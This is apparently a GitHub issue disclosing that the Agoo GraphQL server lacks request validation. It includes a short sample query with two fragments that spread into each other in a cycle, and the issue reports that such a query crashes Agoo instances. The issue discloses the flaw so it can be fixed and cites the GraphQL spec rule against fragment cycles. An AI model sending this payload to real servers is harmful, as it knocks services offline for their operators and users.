Skip to content

Agoo Fragment Cycle Security Vulnerability #109

Closed
@nicholasaleks

Description

Agoo currently does not support request validations meaning cycle fragment requests lead to unbounded results causing instances of Agoo to crash.

Sample exploit script:

query test {
  __schema {
    ...A
  }
}

fragment A on __Schema {
	types {
    fields {
      name
    }
  }
  ...B
}

fragment B on __Schema {
	...A
}

For more information see: https://github.com/nicholasaleks/graphql-threat-matrix/blob/master/implementations/agoo.md

Spec ref: https://spec.graphql.org/October2021/#sec-Fragment-spreads-must-not-form-cycles

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions